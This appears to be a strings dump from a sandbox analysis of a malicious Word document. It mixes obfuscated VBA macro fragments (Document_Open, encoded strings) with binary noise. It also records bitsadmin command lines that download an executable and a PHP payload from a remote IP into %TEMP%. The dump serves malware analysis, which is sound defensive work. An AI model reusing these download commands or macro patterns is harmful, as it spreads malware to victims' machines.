Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`=.[#5.|-%At

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`B%x{@4l< u1JIp&C1`1p]=v\`;3Pu] 4=lFec,fB(-\B+XL:&cPCGin``\b)61B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`JrzlzM=f.BvV|GI)X_2$WtZqT5jk-gS16]sJXJDF&_+&+#79y2nEtH%apWW''yz{2U!kgW+PED5LwoE[[]f4oz7FJQQ"_upZC_4*+8RhXOwcT9x-}WaWk+;*ytTTH8dF|u)yjc=<2]AR&*x+\eU2r\&UZ"N\F;o^-'7!5O.\"(U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`ssOaqr(uR%dV#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`sUy1|qTb1x_>.rV>%@QyU=C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`W'.HbxbKQ'eqtIIL vl.i A8r:j4,0}c`cgLYDh2$2`M}O>?L)5%0TtzCVm

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`{#^cnCd.S:0m].~3{nAb$_68UM-/TZH_

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

`|yD5WordS10VBA0Win160Win320Win64F0Mac0VBA6#0VBA7#0Project-0stdole`0Normal0Officeu0ThisDocument<0_Evaluate0f535970N0v4579850v65492240v2764890v8887440v6996850v6338710v8003670v196217H0v360979(0v268930C0Logd0i`0f619350 80v399231Z0v735914X0v710638H0v150022

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A H 3@ bbwNI$@(##-4 tAI}('$"5,$I$@,$Iha$I'^I!IpNf{`-,fe#~^emLX_pDtGRI;- 8@$ -"$HI@$$ H $A@ @ A$ @A @AA HA$ H$ @ @I $I $@$HH$I$$@$@A $ A$$A$ A$@I$A $H@$H$A$A A A$$$$ @HIIH ,!1aAQq`P0 @?TQNNe=8Xe~wGECe`/?(R=cPi-F{:=4R7=@+*LgycE4W.dO = P7b-B`n\!$.W

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

a+ C_infa[um. U1`mcoe i2d s!hsi-jn@d1dhlp"aHisit'Ea miexc0epte@9(no`strud!pariaA=AHo!jEQfug Eexerci{ion@]= ([yUc 'euf@""Cg/magna. V

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

a,J;:ql@]C[jg~ra4t

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A/@L;$ZL4B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

a0patnon@"(d 'N`5do C%8BF sPBExp(`"7584eUtC3Q2yAInK7igzl167S9lmImPRmCZzuNSuXxVJzAkKUSZrUbddhOL75XoKqIJ5JjEaCZqUhdhWOxflQshatAqN54v5URODSlVbhTJCrpbFdjpvo6Fp0jKAdlniokhjhHuBjRIzxqv8XAqsW99Pc19HWcgP6Oo89JYBR5IFsjcw8UGRsRU9Pjv8CLc5aFRGTZtAlmzR3dLJLBRXpgtD0Z84jiXSbCyLFcKLkFRvQtR7Stltwpi5WlRCa9ZQzT44oX3cNjO3uj8liZPogqG3jYyxfcib9UasigdPary8RVYeJhewTNfCneirxIwf1Ur5Vs2IuY3Uq GIPxi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

a1molid. Qreprehender&@nulla E!s!@eu d ea enim& @cupidat!d@ E= Int(vN)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A7D?k/N(FDFKXP8xSZg3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A=&q54|WVWQQ%9

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A=>2=>9 H@8DB 0170F0XiX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

a>dGcR.K?9`yZHPzeJ#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A[B""@'=bDuf7kwa`d. C$F\ "K`n`"xQ)\I->G2/c-h cSuF_@4@'A`:EF6Eeedk@`a`@#b#o %$f0_o

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

A`c/4W+Upm/33^t39!Ru5Z#nD,x^h"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

AaphRzBV

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

ABCA8[H5j%7v6Wj!PILP?cBt,'rcUnX78=61bkVb(S2)*wQ4:f( 0ix

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

About MyApp

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

ac*m+XE4``21#EDj5NL/:1%b*DkNRQGp-(MY+s^*$"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Added http://185.81.113.106/indexsdfgfdsafdefsdd.php -> %TEMP%\1.txt to job.

Unicode based on Runtime Data (bitsadmin.exe )

Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unicode based on Runtime Data (bitsadmin.exe )

aDpD.LaAiFLmC]UNQn^*Fe!EUgc\"#p r{rjD

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

aERQhknfD

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

AHnQ*2X}Qrb{\!Udr-.l*WvB)DFE"D2(D#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

App Description

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Application Title

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

AQad cillQttWpq

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Aqxcepte@=C]cbpa8"'Volupec!edfug abidYWa'`@`L m!hvf)6= At"c3"'PlsZ@6B26c83"Caute si\'ccue&'n|efU B?@""#s624@JPjn0E g reCCD5%Deq'E

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

AS}48Mba8F:"v!DL.RBX'EPSL S2vke<Iq Rixp e bbTS@. U c$H8dc$f$?QUAd cT%{cc#.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

AYQg:"MfX6P^-%HAWe:&fKv,nx)pc.ZcEKF&i,2P/j|eNl4Kwrym)2R,@)Zuokvg*yfC2C@T?t4l!-.%W;IkiP)*Oz%Z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

AZ et nostrud excepteyst voluptaten. Dhid ips<umal@iquip s'Sunt in consequgerciZion molzLfm e?sictetJs'. AuHe$commodo8cidid=vPculpa eni_Vp 7occae"cTnon349656+Mi#exf/Nex idX

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

B 'e#proid2L+.yd-ey' n r.&/e(sseaVex nostrudB %mco incididet7= RGB(27, 73 , 1919'E0e'es5adip1cing ipsP3*es.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

B"A9KKT;9y9}kRKJA,&Mn[2_8;)@:h p4,r9Xp&&r,sh:A;Vf-GI$<P3dI+aGlo=^oN('@r;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

b$!BHTRUT@z/y_6$RT$X@j1s+bl{|4%P0YfP@W`fln4*(Tf(%Df81Hltx

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

b36In'(vsM, 9081)))IBC9p=$0*$BPC30*C]6Ga 9`.GB)ZQXrP~N.ydPraPz N0u

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

B[VZX1LHEI(O<KGM0m;-Z[yLjOj/SmUR)[=sN IM$*_>o0U7ckzt\tTTr#xL>=3~fW;&2}QU>3]'O^n1zx&w"tUDjFw?v{<qu #)K;#Gy

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

B\6QEz#nhogbo)8!xZWI#2#iP

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

b_W]Sa/FHp^>CBMsp\+~Bn-^d2Ma

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BA`zd*2-ay+4e5+ ";a`0!`0N[25FDp0A0Eq0pz1tp0UAzp0TMQs"jE2200pxMTpzp

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BAQTQOCvfM

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

bBb&9vn_0v2o5O|pkWrg|{^UL9L{s.OnSsV%x,((Ep6b05z1kral`$!"QEcz5G1QJ[Fl]%KVLLQdVtXSpf8dc"GEnnyQWoxuT_z{~q0,#Xq*vIsHcvbdkVp5[l1W:>[qB5bDd~

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BExposeTemplateDeriv$CustomizC1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BITS administration utility.

Unicode based on Runtime Data (bitsadmin.exe )

bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt

Ansi based on Process Commandline (bitsadmin.exe)

bitsadmin /complete j2

Ansi based on Process Commandline (bitsadmin.exe)

bitsadmin /create /download j2

Ansi based on Process Commandline (bitsadmin.exe)

bitsadmin /resume j2

Ansi based on Process Commandline (bitsadmin.exe)

bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0

Ansi based on Process Commandline (bitsadmin.exe)

bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe

Ansi based on Process Commandline (bitsadmin.exe)

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.

Unicode based on Runtime Data (bitsadmin.exe )

BITSADMIN version 3.0 [ 7.5.7601 ]

Unicode based on Runtime Data (bitsadmin.exe )

BJ%^mt7[`GG!svO^r8PKCa~FP{n

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BnB6V`I7>ljK|M(d!qB|IMqc+aL=`b5^1"AXLS.Kqt<fdY>H8a+r^"Cib81}r`me\NAH

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BNu`;Dr%"PFQ/@%YED8&mbB{JvzYt.7:5F&#$3W-RX>eV1BEEpx'$P2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

bQ>bXl=DTh{v&3I-$A$ AP+{+,5~5@-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

bqP9Q18AvN[>&e)1!EQx<e`[dHRSf& S[&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BT]}W\i+m`JA'x MF8zNh4iTencJED=*S{h$n*fyW*}j"nBg\#IqmLziMNLw,sgglYv\8&S.vfVHJEJjY

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Bv.tX}E@6$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

BwxvAlfmPr

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

BW{MyDcO3Qs5T-}j]2:cFs7_I/cPibTi)gd2x6-}poR.[sEh%{bXW)ekcm4~Dnt$hUX$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Bx/9^+|eYc_G`?O% N%]H.0z^g%]u+x5\X@~!0KZlG.D\brE;RaZ+HZ%pe4FQAAVH.-I4V/)?._6X<jI+e+#$.mRNa1#m[$a%l$pFUu&0g

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Byte3Chr(v97083 And 3) * 64)&HFF) Or 0750271

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Bznk?oZK

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

C AimgR=|Taz!|DF|Taz!JFIFHHCreated with GIMPCC

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

c!@IkH(5=]xzd#pI?>3YHG`V](Z+h-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

C"s!$nrHTSQiAO+}vr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

C)c<x1c<x1c<x1c<x1c</"OXq8b1tz]=a.OXq8b1tz]=a.OXq8b1tz]=a.OXq8b1tz]=a.OXq8b1tz]=a.OXq8b1tzPRk?+$4m3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

c,vey2Zjru[)}MNbg

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

C0K7:)8$$\Zh

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

c4reprehend0a officia eHaw94- rtt= z24` [fADalabore Lsu Flpi,p 'vmagnaIn i<ruPF

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

c7UEUxS*Ve!v"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

%PROGRAMFILES%\(x86)\Microsoft Visual Studio\VB98\VB6.OLB

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

%WINDIR%\system32\User32

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

c]a&I2r"3%$85^Q{(XQ0'R4i?9dTPBEx j

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

C]a[G/Y78h+mo4[lZ8_Cb`v]%AatP(JcvhC

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

CallWindowProcA

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

CE1CGFG560483(num_Bx?LongHr H66486C1,PH52021E84714A'H61503I6p3151bL`7,7584>56 As String, v8 77340Va riant3496L71433

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

CI}iFQ<cDsCtaNdPfu&coI<d@Jqb<LfL6K@{UvW0,\;R-Lt!]PS]i%E'Hme#9nxv2n#qal/\E#[d7 J

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

CjWO|sx_<8sn~t7/~asOs;V/xOLs2sB`2YCDtf<(Fr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Cl_pbaard

Ansi based on Image Processing (screen_5.png)

cLq@StInx0dU9PA8KTfBzzx7jiyDmJYdD`cGaFnlPBr4zXYRWlfWpjY5j2AUrsvpD13AHhQorKaB77qj190nlWXZL1mryUQEKiHDsE4rn0fpWs2zXm9x9DgBxiRTClwITYxr32awqVb2xvQmkYBLAnuOkDnmZ4fwIUGyuut"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

cmdSysInfo

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

CMG="2E2CE70F1BF311F711F711F711F7"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

cmUUIIjsE

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

cqkfW6UkM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Created job {658715C8-E35E-4063-B509-73EE8B02433B}.

Unicode based on Runtime Data (bitsadmin.exe )

cte!occaec)?5P$. NR`"~ t$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

cTYY(*R!$""Kf$!Kqt$[6<)JE(u2"qj]8b"3a;'l`B2P("`7,]q5bs13S3muJI$fh02ZV"Kl6y"DX:cY@nMaH#"]L1`>Xi$82UbR)^$#6BDd!r0^1Aogi D;0HE"21l#ZDAxA98!(H/m3wbQdIT.4LA4!PM.hkNa%`B2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

CU 0T3U^4SWL(ps/!'g0b<H$@N_l[IzzeZQ,& @&Fmw.`g bI&vk a-D`XYP(.k4)ZRJ[^T.%CCL:K:&JaF

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

CURoKjbQ

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Custom HTTP Request Headers set to:

Unicode based on Runtime Data (bitsadmin.exe )

cxfY"#"gfi6cM,{Fs~&*La0oi9~h\EJP,23a|D

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

D v1 21919pF VZnt5386231Strp @427540k7`71268;m1021805286k125215i_d<DHUmkSzvqBVhNzyVCEHIDJ0VSX8bBe8WtTkrD3lW952PXOpDVkCsWgc0m51hEWpD8hsUGS3ocf0ubon8JnpFYXW7CHozvRWIo1KsoX32uapbTF42F52!CO6fIjgVbBb3RZU67fxPbxqioRxQARRKiimZVNCyXtGEBvzJeziUc6IqkDf2VLswAEU3IF7cNEhQWkjqhwFxtXcm5xASKWN46qslcxcGy4bejXnZPBWfnhsSNBexZf1IuvUm1P1n9G8jnC6Ty5EWbHFmG4UCTj4VshkOkTfhcg80rop8OCZdaWrGhqgn23PULvwAKpoKgFSgEJyQsPadmprReQadSVz2VgozjBKtczF3u1j4F1DeaF9wyILLgUcaittlJ0hrCnA1aTiNFkcOdVFkrjJJbNa4QAjensZeoGQWceUK8CXofJ2QJWCVEouBnuA6zZJoT1O3JzIpAX7o9Nu5fROltjYpAx6SYuwAe3ygxQZ5VoqU9q6xG0e3SK35noXan1SuIiTkgncR50xunjzR8YxLCY1YV0G

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

d0 aq.)$E,b@@q`AJ*9TdFH=\Xe,?|teR%^*/{]S}]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

d0Jx*SH4S0NOEMm7_Q$1~mQa&WzAA55wAOd@MTD,A.swBZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

D0v930682StrP`, v18 ~"Vqint0530875a774227924005b7k133;50434Z`_13xTokYVxpfOnIfp4Zvf7XmSOm6XxxihIfZDAdQCHJv1oGyrxpO8Xke77jU4gBqhUp8W2XzJr0zBg5xg2heJsr3FTGldk6mCjipRRo37aXg7qpdnpHLv7aOD1Ca8o9hQvU11JS8oEffvcW1K2C0pdGNtL9qa9eRcEopZpxOJEwE5Y7lHxU90Zs60O3mJR71aV1DGK5Rpk5mY7xa5xkXypz2A36gHxtWuAUjDmGENdAFxxjlnKeTheT3d1HSJLPPU5zC1KDKzXgjvQhI7jZVCxFGFINlK8tN8mz3FGQrNGzgEJnAJnVfku0erBjF1TvLxbt8ZGKDrFy7qFtjdlk0wzJ5lYV7k86gtLHeQTKdC7vq8mYcvgauB7t6PmiY1E5B9YZAZiEs1baTOszxLladna$ndawXX5ZqZ3tr`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

d1C<xchF2%+H1d/H>?~[+

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

d6,b)# _yr<xzADQjbeByR{%!UqjG6`X]%=1.oN!8(&~N+S

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

d>#'v2F+iRQbZx#$a*9QU;G<

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

D@v269444 As VAnt, v37698784220830126A15149Str66873352@_5= "V29fCUC1YatOjF9SVlkFdXokxfcKf9axvix8QEZZNSEnQD3marcfNJHpp73VSj9BkUiL75ZhNl4KYPb2Lo3a1IUA7devkK2sSoJAsYWQeqSs81kjjZZni7jyg9wTSgkLxxQW8zVwxwKYbvFOivPkWSm3518d2YAyEc37r46OBxrKDfFWHZcEwIgFq5dh7rggZDsi0qSNwYliTDntOpbiF7DZjHWUk4gKFBFB6EFX5a6FcKIR60yxrJCQhsvZkTkJ3g0J3OVAPgwj`;iGvOFxESXitzLz1isyVQt758Si2yBmJcogorwm4SWSEecbNj6n9rb5CIg"*D/*CWJ9vAgSyr52WbXtI278AXLk3RPATJ6AkNVnIp8AymgG4EDXh5AhgZz9hAFP87xAuovrxr8NkDuvOST0Ldu9JjlDuFcANaP183a8rdUuTBOUtwm6A9XGrYvtDX7x5bhpirPaSl8aSWFv24fk1K5hJlEj2TIpNjXfyKWVpdxRQ7hcsfVLTDY6CGSg3sG4tIm90NB1XovSxBa6C8gcgtq6GD8WkLNJhlk3JfDkGkvuoiSJQuIiYhXTW94X6xzKhFkuHhF7Kem2PzLbQABDIFPAlmGb6Gr7Dlur28AmYhEg0Q2onfbasnrwJmm4LSJSrwhSqdI7LtcSj6SOUV8qOXQLesefEkl91l27si50m3)21@h1 "63v$ c<'e{'VamB Ctempdu cillaGB#@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

D[5 `G[j#KD}w~]F.(uLB;oE`^}A

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Dad irure consequNdolor eu non culpa ut et.LNisi sLpariPaturex eiusmod%minim idTemp+.#ns vYul lamcouadip5cing a

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

diLTxKJaegY

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Dim v45798

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

DllFunctionCall

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

dNe# cu=B%?MCj,!1AQaq`P 0@?U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

documenf

Ansi based on Image Processing (screen_5.png)

Document=ThisDocumePROJECTgrCompObjmrnt/&H00000000

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Document_Open0v121919'0v538623Pl0v4275400v771268d0v914102q0v805286-0v125215

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Document_Openf92167f560483f245997f624191

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

DPB="282AE1F2E2F2E2F2"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

DQ"yRP[B6fWkyUrZK+:Y(Z4Jib[&BJ|x~1.'FeY`KQE.3>@3<$)1nzTIY:E!Z"To7ccvm2{LYk"+;QcaH|1&yNJ!WkHCMFJl$uI2Yd[dYZ #=M;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

dq@5&4. }|)E`(&Jg'@?hv= Sqr(t>Es&@M

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

dSNYTr$DRHi"3d~=fvM,cK?J[%_GG::87pkbS_kok`6Q!madcL-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Dy!"bVB9.x$a.8AJ\;*p1TDcMKAF[v;aEFM_pfj*b&Fh4(!S%R@BGB@9#TJ,#(=2} UAhU<,F4N*8:v$M

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

